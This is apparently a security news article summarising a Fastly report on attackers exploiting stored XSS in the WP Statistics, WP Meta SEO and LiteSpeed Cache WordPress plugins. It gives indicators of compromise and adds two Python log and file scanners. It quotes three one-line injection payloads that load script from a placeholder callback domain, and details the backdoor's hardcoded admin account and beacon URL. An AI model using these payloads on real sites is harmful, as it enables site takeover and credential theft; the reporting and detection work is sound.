Thursday, April 24, 2025

Hackers Exploiting Stored XSS Vulnerabilities in WordPress Plugins

In recent cyberattacks, hackers are actively exploiting stored cross-site scripting (XSS) vulnerabilities in various WordPress plugins.

According to a Fastly report, these vulnerabilities, tracked as CVE-2024-2194, CVE-2023-6961, and CVE-2023-40000, stem from inadequate input sanitization and output escaping, which lets attackers inject malicious scripts.

Vulnerability Details

CVE-2024-2194

The WP Statistics plugin (version 14.5 and earlier) is vulnerable to stored cross-site scripting via the URL search parameter.

utm_id="><script src="https://{CALLBACK_DOMAIN}/"></script>

This vulnerability allows unauthenticated attackers to inject arbitrary web scripts via the URL search parameter.


These scripts are executed whenever a user accesses an injected page.

The attacker repeatedly sends requests that carry this payload in the “utm_id” parameter so that the injected script lands on the most visited pages.

  • Disclosure Date: March 11, 2024
  • Discovered By: Tim Coen
  • Active Installations: Over 600,000
  • Affected Versions: Versions lower than 14.5 remain active on about 48% of all websites using the plugin.

CVE-2023-6961

The WP Meta SEO plugin (version 4.5.12 and earlier) is susceptible to stored cross-site scripting attacks via the Referer HTTP header.

Referer: <script src="https://{CALLBACK_DOMAIN}/"></script>

The attacker sends this payload to a target site, particularly to a page that generates a 404 response.

The WP Meta SEO plugin inserts this unsanitized header into the database to track redirects.

When an administrator loads the 404 & Redirects page, the script pulls obfuscated JavaScript from the callback domain and executes it in the victim’s browser.

  • Disclosure Date: April 16, 2024
  • Discovered By: Krzysztof Zając from CERT PL
  • Active Installations: Over 20,000
  • Affected Versions: Versions lower than 4.5 remain active on about 27% of all websites using the plugin.

CVE-2023-40000

WordPress’s LiteSpeed Cache plugin (version 5.7.0.1 and earlier) is vulnerable to stored cross-site scripting through the ‘nameservers’ and ‘_msg’ parameters.

result[_msg]=<script src="https://{CALLBACK_DOMAIN}/"></script>

The vulnerability is triggered when an administrator opens any backend page: the payload is disguised as an admin notification, so the malicious script executes with the administrator’s credentials and can perform further malicious actions on their behalf.

  • Disclosure Date: February 2024
  • Discovered By: Patchstack
  • Active Installations: Over 5 million
  • Affected Versions: Versions lower than 5.7 remain active on 15.7% of all websites using the plugin.
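All three payloads share one shape: an opening <script tag, either percent-encoded inside a query parameter (utm_id, nameservers, result[_msg]) or sent raw in the Referer header, pointing at an external callback domain. The following added example (not code from the article or from Fastly) shows how a defender can pick these requests out of ordinary combined-format web server logs: it decodes every query parameter with the standard library, flags any parameter or Referer value containing a script tag, and additionally matches the refanged callback domains from the article's IoC list. The log lines are constructed for the example, and callback.example is a placeholder domain.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Callback/tracking domains from the article's IoC section, refanged for matching.
IOC_DOMAINS = [d.replace("[.]", ".") for d in (
    "media.cdnstaticjs[.]com", "cloud.cdndynamic[.]com", "idc.cloudiync[.]com",
    "cdn.mediajsdelivery[.]com", "go.kcloudinc[.]com", "assets.scontentflow[.]com",
    "cache.cloudswiftcdn[.]com",
)]

# Combined log format: client ident user [timestamp] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Opening <script tag, case-insensitive; applied after percent-decoding.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)

# Constructed sample lines (not real traffic). callback.example is a placeholder;
# the first line points at one of the article's IoC domains to show the domain match.
SAMPLE_LOG = """\
203.0.113.10 - - [16/May/2024:10:01:02 +0000] "GET /?utm_id=%22%3E%3Cscript%20src%3D%22https%3A%2F%2Fmedia.cdnstaticjs.com%2F%22%3E%3C%2Fscript%3E HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.11 - - [16/May/2024:10:01:05 +0000] "GET /does-not-exist HTTP/1.1" 404 812 "<script src='https://callback.example/'></script>" "Mozilla/5.0"
203.0.113.12 - - [16/May/2024:10:02:07 +0000] "POST /wp-admin/admin-ajax.php?result%5B_msg%5D=%3Cscript%20src%3D%22https%3A%2F%2Fcallback.example%2F%22%3E%3C%2Fscript%3E HTTP/1.1" 200 64 "-" "Mozilla/5.0"
198.51.100.7 - - [16/May/2024:10:03:00 +0000] "GET /?utm_id=spring_sale HTTP/1.1" 200 5120 "https://www.example.org/" "Mozilla/5.0"
"""


def suspicious_params(target):
    """Decode the query string and return (name, value) pairs whose value holds a <script tag."""
    query = urlsplit(target).query
    return [(n, v) for n, v in parse_qsl(query, keep_blank_values=True) if SCRIPT_TAG.search(v)]


def scan_log(text, ioc_domains=IOC_DOMAINS):
    """Return one finding per suspicious request: client IP, response status and reasons."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined log format; skip rather than guess
        reasons = [f"script tag in query parameter {name!r}"
                   for name, _ in suspicious_params(m["target"])]
        if SCRIPT_TAG.search(m["referer"]):
            reasons.append("script tag in Referer header")
        # Domain match on the decoded request target plus the raw Referer value.
        haystack = (unquote(m["target"]) + " " + m["referer"]).lower()
        reasons += [f"known callback domain {d}" for d in ioc_domains if d in haystack]
        if reasons:
            findings.append({"ip": m["ip"], "status": m["status"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], "; ".join(f["reasons"]))
```

The 404 case matters for CVE-2023-6961: the request itself looks harmless and only the Referer carries the tag, so a rule that inspects only the URL misses it. Grouping findings by client IP also surfaces the single-source floods the article reports for that CVE.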

JavaScript Malware

The contents of the malicious JavaScript perform the following actions:

  • Injects malicious PHP backdoors:
      • into plugin files
      • into theme files
  • Creates a new administrator account:
      • sends a request to the server’s WordPress installation to create a new administrator account
  • Initiates tracking:
      • implements tracking via Yandex, either through JavaScript or a tracking pixel

Excerpt of malicious JavaScript payload

The malicious PHP performs the following:

  • Injects a tracking script:
      • searches recursively for wp-loads.php and injects the following into wp-config.php:
        <script src="https://{TRACKING_DOMAIN}/"></script>
  • Creates a new WordPress admin user:
      • Username: admin
      • Password: 7F9SzCnS6g3AFLAO39Ro
      • Email: admim@mystiqueapi[.]com
  • Tracks infected hosts:
      • sends a GET request to:
        hxxp://ur.mystiqueapi[.]com/?ur=<$_SERVER['HTTP_HOST']>

Threat Actor Activity

CVE-2024-2194

CVE-2024-2194 attack activity

The domain media.cdnstaticjs[.]com is linked to the exploitation of CVE-2024-2194.

We have observed attacks from 17 different IP addresses targeting this vulnerability, primarily originating from AS202425 (IP Volume Inc.) and AS210848 (Telkom Internet LTD), with a concentration of attacks coming from the Netherlands.

CVE-2023-6961

CVE-2023-6961 attack activity

The domain idc.cloudiync[.]com is linked to the exploitation of CVE-2023-6961.

To date, over 5 billion requests have attempted to exploit this vulnerability from a single IP address, which originates from the autonomous system AS202425 (IP Volume Inc.).

Additionally, since May 16th, we have observed media.cdnstaticjs[.]com being used in attack payloads targeting this vulnerability. This domain is also used in attacks targeting CVE-2024-2194.

CVE-2023-40000

CVE-2023-40000 attack activity

The domains cloud.cdndynamic[.]com, go.kcloudinc[.]com, and cdn.mediajsdelivery[.]com are associated with the exploitation of CVE-2023-40000.

The last observed attack using the domain cdn.mediajsdelivery[.]com was on April 15th. Since then, we have only seen cloud.cdndynamic[.]com and go.kcloudinc[.]com being used in attacks targeting this vulnerability.

Unlike the previous two vulnerabilities, the attacks exploiting CVE-2023-40000 are more distributed across different IP addresses and autonomous systems (AS).

We have observed attacks from 1664 distinct IP addresses, primarily originating from AS210848 (Telkom Internet LTD) and AS202425 (IP Volume Inc.).

A significant concentration of attacks came from the Netherlands.

The domain assets.scontentflow[.]com was registered shortly after CVE-2023-6961 was publicly released, and this is the primary domain being written into infected sites in payloads coming from idc.cloudiync[.]com.

Our searches found few web pages containing this payload, indicating limited infection success with it so far.

The domain cache.cloudswiftcdn[.]com was registered before any of the three CVEs were publicly released.

The payloads observed referencing this domain are structured similarly to other observed payloads but add over 40 additional themes to attempt to backdoor.

There are over 3000 pages containing this script, according to searches on PublicWWW.

This, combined with the earlier registration time, might indicate a longer period of use or infection time.

Indicators of Compromise (IOCs)

Domains

media.cdnstaticjs[.]com
cloud.cdndynamic[.]com
idc.cloudiync[.]com
cdn.mediajsdelivery[.]com
go.kcloudinc[.]com
assets.scontentflow[.]com
cache.cloudswiftcdn[.]com

IP Addresses 

80.82.76[.]214
31.43.191[.]220
94.102.51[.]144
94.102.51[.]95
91.223.82[.]150
185.7.33[.]129
101.99.75[.]178
94.242.61[.]217
80.82.78[.]133
111.90.150[.]154
103.155.93[.]120
185.100.87[.]144
185.162.130[.]23
101.99.75[.]215
111.90.150[.]123
103.155.93[.]244
185.209.162[.]247
179.43.172[.]148
185.159.82[.]103
185.247.226[.]37
185.165.169[.]62
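The PHP stage described earlier leaves two file-level traces: a <script> tag written into wp-config.php (a file that holds settings only and should never contain one) and a beacon URL pointing at ur.mystiqueapi[.]com. The following added example (not code from the article or from Fastly) walks a WordPress install, reports any script tag in wp-config.php, any script whose src host is one of the article's IoC domains, and any plain string reference to those domains in other PHP files. The domains are taken from the IoC list above and refanged; the mini WordPress tree it scans is a constructed fixture written to a temporary directory, so the example runs offline.

```python
import os
import re
import tempfile

# Domains from the article's IoC list plus the tracking host named in the PHP
# backdoor description, refanged for matching.
IOC_DOMAINS = [d.replace("[.]", ".") for d in (
    "media.cdnstaticjs[.]com", "cloud.cdndynamic[.]com", "idc.cloudiync[.]com",
    "cdn.mediajsdelivery[.]com", "go.kcloudinc[.]com", "assets.scontentflow[.]com",
    "cache.cloudswiftcdn[.]com", "ur.mystiqueapi[.]com",
)]

# <script ... src="//host/..."> -> capture the host part.
SCRIPT_SRC = re.compile(
    r"""<\s*script\b[^>]*\bsrc\s*=\s*["']?\s*(?:https?:)?//([^/"'\s>]+)""", re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def scan_php_file(path, ioc_domains=IOC_DOMAINS):
    """Return (path, reason) findings for one PHP file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    findings = []
    # wp-config.php holds settings only; any script tag there is foreign.
    if os.path.basename(path) == "wp-config.php" and SCRIPT_TAG.search(text):
        findings.append((path, "script tag in wp-config.php"))
    seen = set()
    for m in SCRIPT_SRC.finditer(text):
        host = m.group(1).lower()
        if host in ioc_domains and host not in seen:
            seen.add(host)
            findings.append((path, f"script loaded from IoC domain {host}"))
    # Plain string references (e.g. the beacon URL) that carry no script tag.
    for dom in ioc_domains:
        if dom not in seen and dom in text.lower():
            findings.append((path, f"reference to IoC domain {dom}"))
    return findings


def scan_tree(root, ioc_domains=IOC_DOMAINS):
    """Scan every .php file under a WordPress root; results are ordered by path."""
    paths = [os.path.join(d, f) for d, _, files in os.walk(root)
             for f in files if f.endswith(".php")]
    findings = []
    for p in sorted(paths):
        findings.extend(scan_php_file(p, ioc_domains))
    return findings


def build_demo_tree():
    """Write a constructed mini WordPress tree to a temp dir (fixture, not real site files)."""
    root = tempfile.mkdtemp(prefix="wpscan-")
    files = {
        "wp-config.php":
            "<?php\ndefine('DB_NAME', 'wp');\n"
            "<script src=\"https://assets.scontentflow.com/\"></script>\n",
        "wp-content/themes/demo/functions.php":
            "<?php\n// legitimate theme asset (constructed); must not be flagged\n"
            "echo '<script src=\"https://cdn.example/lib.js\"></script>';\n",
        "wp-content/plugins/demo/helper.php":
            "<?php\n// constructed fixture: beacon host named in the article\n"
            "$beacon = 'http://ur.mystiqueapi.com/?ur=';\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, reason in scan_tree(build_demo_tree()):
        print(reason, "->", path)
```

Theme and plugin files legitimately load scripts, so the scanner only reports script tags whose host is on the IoC list there; wp-config.php is the one place where any script tag is reported regardless of host. A domain list is a point-in-time indicator, so the wp-config.php rule is the more durable of the two.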


Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
